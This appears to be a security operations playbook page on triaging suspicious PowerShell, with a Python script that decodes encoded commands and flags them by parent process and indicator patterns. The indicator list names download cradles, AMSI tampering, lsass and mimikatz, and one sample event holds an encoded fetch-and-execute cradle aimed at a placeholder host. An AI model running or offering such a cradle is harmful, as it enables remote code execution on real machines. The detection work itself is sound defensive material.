Script Execution Triage
Separate admin automation from suspicious PowerShell, encoded commands, LOLBins, and endpoint follow-up pivots.
Process Context
Review the parent and child process chain before judging the script. Office, browser, archive tools, or unsigned binaries as parents deserve extra attention.
Command Review
Decode encoded content, expand shortened URLs, and look for download cradle behavior, defense evasion, or credential collection.
Follow-Up
Pivot to file writes, network connections, persistence locations, and other alerts on the same user or endpoint.
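As an added worked example (not part of the playbook itself), the following Python script applies the three steps above to constructed process-creation events: it decodes a PowerShell -EncodedCommand argument (base64 of UTF-16LE text), matches the raw and decoded command against a small illustrative indicator list for download cradles, defense evasion and credential collection, and weights the verdict by whether the parent is an Office, browser or archive process. The parent list, indicator patterns, verdict thresholds, `triage` function and sample events are all assumptions chosen for illustration, not a tuned rule set.

```python
import base64
import re

# Parent processes the playbook says deserve extra attention when they launch a script host.
# Assumed list for illustration; extend per environment.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",  # Office
    "chrome.exe", "msedge.exe", "firefox.exe",                   # browsers
    "7zfm.exe", "winrar.exe",                                    # archive tools
}

# Illustrative patterns per playbook category (assumed, not a production rule set).
INDICATORS = {
    "download_cradle": [
        r"downloadstring", r"downloadfile", r"net\.webclient",
        r"invoke-webrequest", r"\biwr\b", r"invoke-expression", r"\biex\b", r"bitstransfer",
    ],
    "defense_evasion": [
        r"-w(?:indowstyle)?\s+hidden", r"-nop(?:rofile)?\b", r"-e(?:xecutionpolicy|p)\s+bypass",
        r"set-mppreference", r"amsiutils", r"disablerealtimemonitoring",
    ],
    "credential_collection": [
        r"lsass", r"sekurlsa", r"mimikatz", r"get-credential",
    ],
}

# Matches -e / -ec / -enc / -encodedcommand (PowerShell accepts prefix abbreviations)
# but not -ExecutionPolicy, then captures the base64 argument.
ENCODED_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> dict:
    """Apply the three playbook steps to one process-creation event (dict with parent and cmdline)."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    # Step 2: review the decoded script instead of the base64 blob, alongside the raw switches.
    scrubbed = ENCODED_ARG.sub("-EncodedCommand [decoded below]", cmdline) if decoded else cmdline
    haystack = (scrubbed + "\n" + (decoded or "")).lower()
    findings = {
        category: [p for p in patterns if re.search(p, haystack)]
        for category, patterns in INDICATORS.items()
    }
    # Step 1: weigh the parent process before judging the script.
    parent_flag = event.get("parent", "").lower() in SUSPICIOUS_PARENTS
    hits = sum(len(v) for v in findings.values())
    # Step 3 (assumed thresholds): decide whether to pivot to file/network/persistence telemetry.
    if findings["download_cradle"] or findings["credential_collection"] or (parent_flag and hits):
        verdict = "escalate"        # pivot to file writes, network, persistence, related alerts
    elif hits or parent_flag or decoded is not None:
        verdict = "review"          # weak signals only; confirm against known admin automation
    else:
        verdict = "likely_admin"
    return {"decoded": decoded, "parent_flag": parent_flag, "findings": findings, "verdict": verdict}


def _encode(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {   # Office parent launching an encoded download cradle
        "id": "evt-1",
        "parent": "WINWORD.EXE",
        "cmdline": "powershell.exe -nop -w hidden -enc "
                   + _encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    },
    {   # scheduled admin script launched by a service host
        "id": "evt-2",
        "parent": "svchost.exe",
        "cmdline": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\rotate-logs.ps1",
    },
    {   # interactive command with one weak switch, no parent concern
        "id": "evt-3",
        "parent": "explorer.exe",
        "cmdline": "powershell.exe -NoProfile -Command \"Get-Service | Where-Object Status -eq Running\"",
    },
]


def triage_all(events) -> dict:
    """Run triage over a batch and key the results by event id."""
    return {e["id"]: triage(e) for e in events}


if __name__ == "__main__":
    for event_id, result in triage_all(SAMPLE_EVENTS).items():
        print(event_id, result["verdict"], {k: v for k, v in result["findings"].items() if v})
```

Matching on the decoded text rather than the base64 blob matters: base64 output can contain byte runs that accidentally match short keywords such as `iex`, so the scrubbed command line replaces the encoded argument before the indicator search. The `-NoProfile` hit on evt-3 shows why defense-evasion switches alone only earn a "review" verdict; they are common in legitimate automation and need the parent and follow-up context before escalation.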
Related
- Living-off-the-Land Binaries — how living-off-the-land binary attacks work and how to detect them
- Process Injection — detection and response for T1055 techniques
- Sysmon — detection and response for T1654 techniques
- EDR Basics — detection and response for T1059, T1003, T1055, T1204, T1562 techniques
- Windows Event Logging — detection and response for T1562 techniques
